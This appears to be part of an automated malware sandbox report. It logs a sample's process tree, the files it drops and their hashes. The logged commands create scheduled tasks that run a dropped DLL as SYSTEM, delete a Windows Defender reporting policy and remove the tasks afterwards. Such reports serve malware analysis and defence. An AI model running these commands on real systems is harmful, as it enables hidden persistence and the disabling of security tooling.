- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "qcUOvNLqmSmqpxF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qcUOvNLqmSmqpxF"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nCtegvDAmjdVDw" /F /xml "C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VircTphmeRxIj2" /F /xml "C:\ProgramData\BekoRFZthbLHeaVB\rMfVNnD.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BPTpyhbDHEioZHGkr2" /F /xml "C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aTjIGRcnJusWUoAznGe2" /F /xml "C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "vdoHbRZAyoFFuVbVu" /SC once /ST 00:29:11 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "vdoHbRZAyoFFuVbVu"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "cfFFKgQyvKFYWQGgS"2⤵
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll",#1 /site_id 5254031⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "vdoHbRZAyoFFuVbVu"3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\FpvksngNCKIjC\TfhVTUk.xmlFilesize
2KB
MD572c2e86551b289b154762178ee009b40
SHA11d66930eafa8e5edb68475ac7656cf3880886c19
SHA25611b090d0e297dde633d8aa979eb0a2e05cb93a3467b69477aa41b3b6ff77516a
SHA5122cfb6a88f0644715fc4d2fecd83c8a928d9bdd0f81ef4edd6f0515ecb5925ea5844d88fc1debddc5b48845e936035bc9321a448b02776bff65eccf5c08675141
-
C:\Program Files (x86)\QqSrWmvdGtwU2\qDiwqFm.xmlFilesize
2KB
MD59f9035769df5a448a3cb1511ab5d95d0
SHA1389a26a98bff59235c787a3c4c59183a22dad440
SHA256545aab4d21d1f4959ee463994053af9ee874bf6028eba1b052b4ef4b8e892df8
SHA512ecec07e57fa318719edae9816b80c203224ef59cfb44c83ffd3d852fd6d5170da68549a44c297f6f0072bb11e170d2e797ef5f1237515b144bc0eaf47d5d8d98
-
C:\Program Files (x86)\RIuAFuLLU\hWSTyae.xmlFilesize
2KB
MD5f2d5ec2f6e990810394dfe4721dd5a60
SHA1605bd37dacef18fd5015c0e4b9f560f3d219d9ea
SHA256452bb0e0f18ed685e03b77a34c262a3b3ea37f685ba4351ee5aaf6cd95ccd562
SHA512d6eee7458b321a85a65172d52aeafa36d2dc786c6b645771ba11191de0e62c11b7973a599ede1af9aacca9f94665e952996da132e5dca533f96f2fc802e695d1
-
C:\Program Files (x86)\fGfduYyRRUhwWrnEYNR\pGcANWJ.xmlFilesize
2KB
MD5469bc0c243879c688ceafc5ce2cda889
SHA1044175e80ba91409c1dfb9aadfc5cf724cace51f
SHA2568f8a14b4bffe16e798af228c09a7296a22c7ede2f8bdddf11d59159cf348ff40
SHA5127b591761cea963df3fb81dfd3f3972215de1cc65e83a3c99b944070d023b004241c2dace5653947d0afd93f6dbd557c77cb614e422e2736c1b0a5bf8b20adec3
-
C:\ProgramData\BekoRFZthbLHeaVB\rMfVNnD.xmlFilesize
2KB
MD59196a47223d7fa5fe6684f328f374ace
SHA1236f9332491bc91bb6616d35b5490e3009098b7e
SHA25662f937088967ecfd2ffce02f1ea20816769a8c4ce6dff2a52abcb035059d5c05
SHA51227e0e614bbf3f9d916963100f9c5f8dfe2887f41f992e27ec145b7efb1af09727a2751328214718c1409e90407ef3d203e676cc1ed6eee14c5b4f0b4fa0053e0
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD550a8221b93fbd2628ac460dd408a9fc1
SHA17e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA25646e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA51227dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0
-
C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exeFilesize
6.2MB
MD57dc21db165675d7494f9c528235c1f2f
SHA100f04ee80c3e19d22c4a224f7aeb95ddf69571cc
SHA256a5b2ab287d56c737ca5ffaf39dfd9345f91b88706dffee4e00dda8f48dff278b
SHA512ec99a73032ece6733aae86e90eefcc184c694e5bf75e0b70776b63f616d8edf23e3532547fee30be6cfb0cb4fdbdc1635c8e7e5996c2c3b93e2025247d57706d
-
C:\Users\Admin\AppData\Local\Temp\7zS9CF0.tmp\Install.exeFilesize
6.2MB
MD57dc21db165675d7494f9c528235c1f2f
SHA100f04ee80c3e19d22c4a224f7aeb95ddf69571cc
SHA256a5b2ab287d56c737ca5ffaf39dfd9345f91b88706dffee4e00dda8f48dff278b
SHA512ec99a73032ece6733aae86e90eefcc184c694e5bf75e0b70776b63f616d8edf23e3532547fee30be6cfb0cb4fdbdc1635c8e7e5996c2c3b93e2025247d57706d
-
C:\Users\Admin\AppData\Local\Temp\7zS9FDE.tmp\Install.exeFilesize
6.7MB
MD5a3a5844f879f532ab98d5ba18ca099bf
SHA112d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Users\Admin\AppData\Local\Temp\7zS9FDE.tmp\Install.exeFilesize
6.7MB
MD5a3a5844f879f532ab98d5ba18ca099bf
SHA112d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exeFilesize
6.7MB
MD5a3a5844f879f532ab98d5ba18ca099bf
SHA112d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Users\Admin\AppData\Local\Temp\qOrnnoslxFEibVOnF\ChQsEQNyswpenHU\FdzMbCA.exeFilesize
6.7MB
MD5a3a5844f879f532ab98d5ba18ca099bf
SHA112d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
11KB
MD5b65e199670fbe77add43cdf17d124b54
SHA17eaa9a80cb08057eb0763035f4aaf71011cff46d
SHA256de5a15151d9101ad540c66890ce914f42d59bd6f168311cab735d7303e28034b
SHA512aed90a34a50f9f0690533f1b64f5bb9f598fa668eb1c6f72f3d778b297c13ee7579a5f5ca23892530aa63bd0e6274bb2e38b707e8e5cd6cc5818b73336d61ed7
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dllFilesize
6.2MB
MD5e352e328cf687644c8721e2630bedfe8
SHA10e1b2807bf28d072db7856ece995eb831009b6b1
SHA25677e09b3ab0ac968ff1785cc52cac7285e8839d616dfef672fe77387cd31b8f3a
SHA5123a2e8a83cec2f899ff7fe8aadaf8789e2f34010261708b514944811b2fa9a65cf4805ea2d683ae951506779cc94ee8ae61601f49bcd5353c1e779e34dbbc2d13
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\fCXSDpnC\FTyDXiB.dllFilesize
6.2MB
MD5e352e328cf687644c8721e2630bedfe8
SHA10e1b2807bf28d072db7856ece995eb831009b6b1
SHA25677e09b3ab0ac968ff1785cc52cac7285e8839d616dfef672fe77387cd31b8f3a
SHA5123a2e8a83cec2f899ff7fe8aadaf8789e2f34010261708b514944811b2fa9a65cf4805ea2d683ae951506779cc94ee8ae61601f49bcd5353c1e779e34dbbc2d13
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exeFilesize
6.7MB
MD5a3a5844f879f532ab98d5ba18ca099bf
SHA112d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Windows\Temp\jUlWXsHGbnJNPdLP\oqHWkXuwqeQQHza\aTeDbPf.exeFilesize
6.7MB
MD5a3a5844f879f532ab98d5ba18ca099bf
SHA112d23302494fcb3a45c0e43c56bc100dbfda84ad
SHA256c0d938a16e6e3f34e89df5588f6ac47c9ab57e8b25a210f34944679776c919a1
SHA512b83086d378fa26dd057b8c683b57fd89db2f6d2a6f7d1dca9ecf66efc097fd8310a0e567da8965c6769d9eee3ade6933ee7a795d04bb20f6d15d7ec3464630a7
-
C:\Windows\system32\GroupPolicy\Machine\Registry.polFilesize
5KB
MD5258904a9ef758b7f35ae1fd7a58a00c6
SHA17bff985b035af3456185e6021b08b1d94aec76ac
SHA256cb09dda385ea1354cab67af6b7824ec8322073ca6d523985bc3a05de08e8169f
SHA512ff92029c342f5e2766078922ceaa7b2593e76db4e879579fedff1199150191b894d1eda61634ac1c2de925d109cac2203a3e767357afd7edf38e68428b1580ec
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/228-200-0x0000000000000000-mapping.dmp
-
memory/240-202-0x0000000000000000-mapping.dmp
-
memory/584-186-0x0000000000000000-mapping.dmp
-
memory/616-171-0x0000000000000000-mapping.dmp
-
memory/672-142-0x0000000000000000-mapping.dmp
-
memory/992-191-0x0000000000000000-mapping.dmp
-
memory/992-148-0x0000000000000000-mapping.dmp
-
memory/1116-205-0x0000000000000000-mapping.dmp
-
memory/1152-215-0x0000000000000000-mapping.dmp
-
memory/1264-185-0x0000000000000000-mapping.dmp
-
memory/1452-147-0x0000000000000000-mapping.dmp
-
memory/1484-146-0x0000000000000000-mapping.dmp
-
memory/1504-143-0x0000000000000000-mapping.dmp
-
memory/1508-173-0x0000000000000000-mapping.dmp
-
memory/1512-204-0x0000000000000000-mapping.dmp
-
memory/1612-187-0x0000000000000000-mapping.dmp
-
memory/1656-184-0x0000000000000000-mapping.dmp
-
memory/1816-221-0x0000000000000000-mapping.dmp
-
memory/1928-193-0x0000000000000000-mapping.dmp
-
memory/1968-177-0x0000000000000000-mapping.dmp
-
memory/2000-172-0x0000000000000000-mapping.dmp
-
memory/2192-175-0x0000000000000000-mapping.dmp
-
memory/2264-181-0x0000000000000000-mapping.dmp
-
memory/2268-150-0x0000000000000000-mapping.dmp
-
memory/2324-201-0x0000000000000000-mapping.dmp
-
memory/2356-144-0x0000000000000000-mapping.dmp
-
memory/2356-190-0x0000000000000000-mapping.dmp
-
memory/2392-213-0x0000000000000000-mapping.dmp
-
memory/2452-162-0x0000000000000000-mapping.dmp
-
memory/2452-168-0x00000000053B0000-0x00000000053CE000-memory.dmpFilesize
120KB
-
memory/2452-164-0x00000000047B0000-0x0000000004DD8000-memory.dmpFilesize
6.2MB
-
memory/2452-163-0x0000000001A60000-0x0000000001A96000-memory.dmpFilesize
216KB
-
memory/2452-165-0x0000000004400000-0x0000000004422000-memory.dmpFilesize
136KB
-
memory/2452-166-0x00000000045A0000-0x0000000004606000-memory.dmpFilesize
408KB
-
memory/2452-167-0x0000000004740000-0x00000000047A6000-memory.dmpFilesize
408KB
-
memory/2496-216-0x0000000000000000-mapping.dmp
-
memory/2568-152-0x0000000000000000-mapping.dmp
-
memory/2624-188-0x0000000000000000-mapping.dmp
-
memory/2664-155-0x0000000000000000-mapping.dmp
-
memory/2844-149-0x0000000000000000-mapping.dmp
-
memory/2852-192-0x0000000000000000-mapping.dmp
-
memory/2856-198-0x0000000000000000-mapping.dmp
-
memory/2872-176-0x0000000000000000-mapping.dmp
-
memory/3092-203-0x0000000000000000-mapping.dmp
-
memory/3236-179-0x0000000000000000-mapping.dmp
-
memory/3248-180-0x0000000000000000-mapping.dmp
-
memory/3468-141-0x0000000000000000-mapping.dmp
-
memory/3544-197-0x0000000000000000-mapping.dmp
-
memory/3736-151-0x00000196AA740000-0x00000196AA762000-memory.dmpFilesize
136KB
-
memory/3736-154-0x00007FFBA6E80000-0x00007FFBA7941000-memory.dmpFilesize
10.8MB
-
memory/3736-153-0x00007FFBA6E80000-0x00007FFBA7941000-memory.dmpFilesize
10.8MB
-
memory/3764-170-0x0000000000000000-mapping.dmp
-
memory/3808-222-0x0000000000000000-mapping.dmp
-
memory/3828-159-0x0000000010000000-0x00000000119C6000-memory.dmpFilesize
25.8MB
-
memory/3852-169-0x0000000000000000-mapping.dmp
-
memory/3860-145-0x0000000000000000-mapping.dmp
-
memory/3912-211-0x0000000000000000-mapping.dmp
-
memory/3916-212-0x0000000000000000-mapping.dmp
-
memory/3928-174-0x0000000000000000-mapping.dmp
-
memory/4040-209-0x0000000000000000-mapping.dmp
-
memory/4080-208-0x0000000000000000-mapping.dmp
-
memory/4152-199-0x0000000000000000-mapping.dmp
-
memory/4280-156-0x0000000000000000-mapping.dmp
-
memory/4312-220-0x00007FFBA66C0000-0x00007FFBA7181000-memory.dmpFilesize
10.8MB
-
memory/4316-178-0x0000000000000000-mapping.dmp
-
memory/4428-206-0x0000000000000000-mapping.dmp
-
memory/4480-189-0x0000000000000000-mapping.dmp
-
memory/4568-219-0x0000000000000000-mapping.dmp
-
memory/4724-207-0x0000000000000000-mapping.dmp
-
memory/4748-210-0x0000000000000000-mapping.dmp
-
memory/4868-135-0x0000000000000000-mapping.dmp
-
memory/4868-138-0x0000000010000000-0x00000000119C6000-memory.dmpFilesize
25.8MB
-
memory/4920-183-0x0000000000000000-mapping.dmp
-
memory/4960-132-0x0000000000000000-mapping.dmp
-
memory/4968-182-0x0000000000000000-mapping.dmp
-
memory/4992-249-0x0000000001700000-0x00000000030C6000-memory.dmpFilesize
25.8MB
-
memory/5052-194-0x0000000000000000-mapping.dmp
-
memory/5080-232-0x000000000B5B0000-0x000000000B613000-memory.dmpFilesize
396KB
-
memory/5080-242-0x000000000BFA0000-0x000000000C01B000-memory.dmpFilesize
492KB
-
memory/5080-228-0x000000000B2D0000-0x000000000B355000-memory.dmpFilesize
532KB
-
memory/5080-246-0x000000000CE60000-0x000000000CF15000-memory.dmpFilesize
724KB